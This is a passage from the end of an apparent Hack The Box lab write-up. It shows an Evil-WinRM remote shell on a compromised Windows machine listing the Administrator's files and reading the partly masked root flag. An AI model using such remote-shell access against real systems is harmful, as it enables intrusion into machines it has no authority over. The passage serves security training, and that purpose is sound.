d-r---        8/24/2021   7:51 AM                Saved Games
d-r---        8/24/2021   7:51 AM                Searches
d-r---        8/24/2021   7:51 AM                Videos


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       10/10/2022   6:56 AM             34 root.txt


    Directory: C:\Users\Administrator\Favorites


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        8/24/2021   7:51 AM                Links
-a----        8/24/2021   7:51 AM            208 Bing.url


    Directory: C:\Users\Administrator\Links


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/24/2021   7:51 AM            518 Desktop.lnk
-a----        8/24/2021   7:51 AM            975 Downloads.lnk

As we can see, we now can access everything in the system including the contents of the Administrator's home directory. Let's continue and retrieve the root flag as if this was part of the OSCP (using ipconfig and type):

*Evil-WinRM* PS C:\Users\maria\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::13f
   IPv6 Address. . . . . . . . . . . : dead:beef::f8b8:c26c:96a:3a91
   Link-local IPv6 Address . . . . . : fe80::f8b8:c26c:96a:3a91%12
   IPv4 Address. . . . . . . . . . . : 10.129.96.147
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%12
                                       10.129.0.1
*Evil-WinRM* PS C:\Users\maria\Documents> type C:\Users\Administrator\Desktop\root.txt
6ad590********************552c43

AND we got root!!

PreviousStreamIO NextSupport

Last updated 2 years ago

Was this helpful?